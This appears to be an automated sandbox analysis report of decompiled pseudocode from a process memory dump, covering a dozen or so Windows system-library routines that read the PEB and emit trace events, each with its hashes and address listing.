Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b28f5f2e6dae870814a53eb217a11b5fca564274afb7a090fa5769e58187db92
Instruction ID: c6f2115831dcabdb51bd60888335cade92e11538b05e84b9c980bd93eecab83f
Opcode Fuzzy Hash: b28f5f2e6dae870814a53eb217a11b5fca564274afb7a090fa5769e58187db92
Instruction Fuzzy Hash: A2015271A0125CAFDB14DFA9D842EAEBBB8FF44714F404066F904EB290E674AE01C795

Uniqueness

Uniqueness Score: -1.00%

Function 048D58EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E048D58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x49cd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x48b5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E048D5943() != 0 &&  *0x49c5320 > 5) {
					E04957B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04957B5E( &_v28, _t28);
					_t11 = E04957B9C(0x49c5320, 0x48bbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0491B640(_t11, _t17, _v8 ^ _t29, 0x48bbf15, _t27, _t28);
			}

0x048d58fb
0x048d58fe
0x048d5906
0x048d590a
0x048d593c
0x048d593c
0x048d590c
0x048d590c
0x048d5911
0x00000000
0x048d5913
0x048d5913
0x048d5913
0x048d5911
0x048d591d
0x04931035
0x0493103c
0x0493103f
0x04931056
0x04931056
0x048d593b

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef8170d05d6b787e0e92c87fd826d98c5887080d850ff96f2065367f2997649c
Instruction ID: 3b5205c2d96bad6ebdddad0b4d6a591b37a7e166445c58eaa5596ff9a0f51cea
Opcode Fuzzy Hash: ef8170d05d6b787e0e92c87fd826d98c5887080d850ff96f2065367f2997649c
Instruction Fuzzy Hash: DE01D431A01108BFE715DA68EC009BE77A8EB80278F9506BA9805E7254EE30FD06C790

Uniqueness

Uniqueness Score: -1.00%

Function 0498FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0498FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x49cd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0491FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E048F7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0491B640(E04919AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0498fec0
0x0498fec0
0x0498fecf
0x0498fed9
0x0498fede
0x0498fee0
0x0498feeb
0x0498fef3
0x0498fef6
0x0498fef9
0x0498ff04
0x0498ff16
0x0498ff06
0x0498ff0f
0x0498ff0f
0x0498ff21
0x0498ff22
0x0498ff24
0x0498ff29
0x0498ff3e

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adbf84e4868e5f751448b06d2ac1d8fd532bdd92c84554bf1e14ba4df6a09d19
Instruction ID: 4e46fd4d1c51956d4658e3403cf8bafad1c3a4ea4cd5d81fa8490b80a6e6d1fc
Opcode Fuzzy Hash: adbf84e4868e5f751448b06d2ac1d8fd532bdd92c84554bf1e14ba4df6a09d19
Instruction Fuzzy Hash: A5018871E4120CABD714EBA9D845FAEB7B8EF44714F404076F900DB291E974A941C795

Uniqueness

Uniqueness Score: -1.00%

Function 0498FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0498FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x49cd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0491FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E048F7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0491B640(E04919AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0498fe3f
0x0498fe3f
0x0498fe4e
0x0498fe58
0x0498fe5d
0x0498fe5f
0x0498fe6a
0x0498fe72
0x0498fe75
0x0498fe78
0x0498fe83
0x0498fe95
0x0498fe85
0x0498fe8e
0x0498fe8e
0x0498fea0
0x0498fea1
0x0498fea3
0x0498fea8
0x0498febd

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0471980cbaebd9e63561e2059ebceec5b23ef6189c2fe7a0d6e859d171aa6a
Instruction ID: 5c0c34ab655eca106177bfb6781242a22ede0ca468700525d60a68257cbcff9f
Opcode Fuzzy Hash: 5e0471980cbaebd9e63561e2059ebceec5b23ef6189c2fe7a0d6e859d171aa6a
Instruction Fuzzy Hash: 39018471E0124CABDB14EFA9D845FAEBBB8EF84714F00407AF900EB291DA74A901C795

Uniqueness

Uniqueness Score: -1.00%

Function 048EB02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048EB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E048F7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04957016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x048eb037
0x048eb039
0x048eb03b
0x048eb040
0x0493a60e
0x00000000
0x00000000
0x0493a61d
0x048eb04b
0x048eb04e
0x0493a627
0x0493a634
0x00000000
0x00000000
0x0493a641
0x0493a653
0x0493a643
0x0493a64c
0x0493a64c
0x0493a65b
0x00000000
0x00000000
0x00000000
0x0493a66c
0x048eb057
0x048eb057
0x048eb057
0x048eb046
0x048eb046
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 6a2a407d45db687ccb0508997d15c8f22fdf5fb7416efc13f8ae6d8887e05f7a
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 0E018F323059849FE322DB5DC988F7677ECEB46768F0904B1F919CBA61E668FC40C621

Uniqueness

Uniqueness Score: -1.00%

Function 049A1074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E049A1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E049A165E(__ebx, 0x49c8ae4, (__edx -  *0x49c8b04 >> 0x14) + (__edx -  *0x49c8b04 >> 0x14), __edi, __ecx, (__edx -  *0x49c8b04 >> 0x14) + (__edx -  *0x49c8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0499AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E048F7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0498FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x049a1074
0x049a1080
0x049a1082
0x049a108a
0x049a108f
0x049a1093
0x049a10ab
0x049a10ab
0x049a10c3
0x049a10cf
0x049a10e1
0x049a10d1
0x049a10da
0x049a10da
0x049a10e9
0x049a10f5
0x049a10f5
0x049a10fe

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9395b1217fe87b23a25486ea76260c98f8e534367c8e061f31e0a79fd21a64d
Instruction ID: 128b1ff9d3be7e7ebd19ca728fbadbfa2e5582a624a73a2b0393fef329e7a5db
Opcode Fuzzy Hash: d9395b1217fe87b23a25486ea76260c98f8e534367c8e061f31e0a79fd21a64d
Instruction Fuzzy Hash: CF0124726047919FD710EF68C805B1AB7E9ABC4318F048A39F88583690EE34F860CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 049A8ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E049A8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x49cd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E048F7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0491B640(E04919AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x049a8ed6
0x049a8ee5
0x049a8eed
0x049a8ef0
0x049a8efa
0x049a8f03
0x049a8f0c
0x049a8f15
0x049a8f24
0x049a8f27
0x049a8f31
0x049a8f43
0x049a8f33
0x049a8f3c
0x049a8f3c
0x049a8f4e
0x049a8f4f
0x049a8f51
0x049a8f56
0x049a8f69

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 157d08d5193fee241467c64b906ad8e9ad6bb8b01d873350e8f116dd1157f6dd
Instruction ID: 61ada938af7c5d8abac793240eb1a5c53711bba4faac85836458482ff6070ca6
Opcode Fuzzy Hash: 157d08d5193fee241467c64b906ad8e9ad6bb8b01d873350e8f116dd1157f6dd
Instruction Fuzzy Hash: AF111E70E002499FDB04DFA9D541BAEBBF4FF08304F0442BAE918EB381E634A940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 049A8A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E049A8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x49cd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E048F7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0491B640(E04919AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x049a8a62
0x049a8a71
0x049a8a79
0x049a8a82
0x049a8a85
0x049a8a89
0x049a8a8c
0x049a8a8f
0x049a8a92
0x049a8a95
0x049a8a9f
0x049a8ab1
0x049a8aa1
0x049a8aaa
0x049a8aaa
0x049a8abc
0x049a8abd
0x049a8abf
0x049a8ac4
0x049a8ada

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc7d7062bd83bf273e9a014c3dfbeb5c05c302bc3efd3e5fa8c5392241136a1f
Instruction ID: 24ccaccf2166bab88e27f87d8026c5116186996b0a7870d7eb96684f1374f52a
Opcode Fuzzy Hash: dc7d7062bd83bf273e9a014c3dfbeb5c05c302bc3efd3e5fa8c5392241136a1f
Instruction Fuzzy Hash: D6012CB1A0121CAFDB04EFA9D9459AEBBB8FF48314F10406AF904E7351E634AD11CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 048DDB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048DDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E048DDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E048DE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L048DE8B0(__ecx, _t14, 0xfff);
							L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x048ddb64
0x048ddb66
0x048ddb6b
0x048ddbaa
0x048ddb71
0x048ddb76
0x048ddb7a
0x048ddba3
0x048ddb7c
0x048ddb87
0x048ddb8b
0x04934fa1
0x04934fb3
0x04934fb8
0x048ddb91
0x048ddb96
0x048ddb98
0x048ddb98
0x048ddb8b
0x048ddb7a
0x048ddb9d
0x048ddba2

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 1317d538a09639bf8b813eb774f6001856c399f8c999b90c09095074246e69c1
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: A4F09C332439669FE7725A598880F67B7D59FC1B6CF160A35F105DB344CAA0BC0296D1

Uniqueness

Uniqueness Score: -1.00%

Function 048DB1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048DB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E048F7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E048F7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04957016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x048db1e8
0x048db1ea
0x048db1f3
0x04934a17
0x048db1f9
0x048db1f9
0x048db1f9
0x048db201
0x04934a21
0x04934a2e
0x00000000
0x00000000
0x04934a3b
0x04934a4d
0x04934a3d
0x04934a46
0x04934a46
0x04934a55
0x00000000
0x00000000
0x00000000
0x048db20a
0x048db20a
0x048db20a
0x048db20a

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 1adc09ce74b06473a7174f161542f38604829dba13e10a0fbfbd7a2dc57e47f5
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 590186322015849BE7229B5DC904F597B99EF42754F0A45B1F914CB6B1E775F800D315

Uniqueness

Uniqueness Score: -1.00%

Function 0496FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0496FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x49cd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E048F7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0491B640(E04919AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0496fe96
0x0496fe9e
0x0496fea1
0x0496fead
0x0496feb3
0x0496feb9
0x0496fec3
0x0496fed5
0x0496fec5
0x0496fece
0x0496fece
0x0496fee0
0x0496fee1
0x0496fee3
0x0496fee8
0x0496fefb

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424c7c88d90da2b9d2de3460a8c8590c9d0b7ae5b32b2a21496c1d3a071982ed
Instruction ID: 1ef9fd9680680c801f62e79c1944820a50e64ec58b43653164ebe02c843eb137
Opcode Fuzzy Hash: 424c7c88d90da2b9d2de3460a8c8590c9d0b7ae5b32b2a21496c1d3a071982ed
Instruction Fuzzy Hash: ED016270A0020CAFDB14DFA8D545A6EBBF4FF08304F104569E505DB392D635E901CB80

Uniqueness

Uniqueness Score: -1.00%

Function 049A8F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E049A8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x49cd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E048F7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0491B640(E04919AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x049a8f6a
0x049a8f79
0x049a8f81
0x049a8f84
0x049a8f8b
0x049a8f91
0x049a8f94
0x049a8f9e
0x049a8fb0
0x049a8fa0
0x049a8fa9
0x049a8fa9
0x049a8fbb
0x049a8fbc
0x049a8fbe
0x049a8fc3
0x049a8fd6

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71d678e38cd7adb0d2a27dbfb524e779442be1a313ccca3939ca0db76752de02
Instruction ID: 7040d87aee3aa3ce0b17d816680e2b49e88f38a999ed079b419db1fb3467b633
Opcode Fuzzy Hash: 71d678e38cd7adb0d2a27dbfb524e779442be1a313ccca3939ca0db76752de02
Instruction Fuzzy Hash: 36013674A4120D9FD704EFA8D545A5EB7B4EF48304F504465B905EB350D674EA10CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0499131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0499131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x49cd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E048F7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0491B640(E04919AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0499131b
0x0499132a
0x04991330
0x04991336
0x0499133e
0x04991341
0x04991344
0x0499134f
0x04991361
0x04991351
0x0499135a
0x0499135a
0x0499136c
0x0499136d
0x0499136f
0x04991374
0x04991387

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ae5127914fe8335e6ff384ae859fef43386163a753f339546af7f240b7294cc
Instruction ID: 4d2842cd4d68ab1491a7cdffd67500ea8435f84be5756aef22aa8fc38ecea00e
Opcode Fuzzy Hash: 9ae5127914fe8335e6ff384ae859fef43386163a753f339546af7f240b7294cc
Instruction Fuzzy Hash: 00013171A0124CAFDB04EFA9D546AAEB7F4FF48740F40406AF945EB351E674AA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04991608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E04991608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x49cd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E048F7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0491B640(E04919AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x04991608
0x04991617
0x0499161d
0x04991625
0x04991628
0x0499162b
0x04991636
0x04991648
0x04991638
0x04991641
0x04991641
0x04991653
0x04991654
0x04991656
0x0499165b
0x0499166e

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c848707d5be74fd4cfa79fafd83a92f90a0129fe33a1b26ef3b6fadcdd6a7d5f
Instruction ID: 9d7a8c4e9a4e5b28a39203ab32f1b8a36406f86d43623e18cd58d49a5ce7e589
Opcode Fuzzy Hash: c848707d5be74fd4cfa79fafd83a92f90a0129fe33a1b26ef3b6fadcdd6a7d5f
Instruction Fuzzy Hash: 78F04F71E05248AFEB04EFA8D505A6EB7F4FF58300F444169A905EB291E634A900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 048FC577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048FC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E048FC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x48b11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E049A88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x048fc577
0x048fc57d
0x048fc581
0x048fc5b5
0x048fc5b9
0x048fc5ce
0x048fc5ce
0x048fc5ca
0x00000000
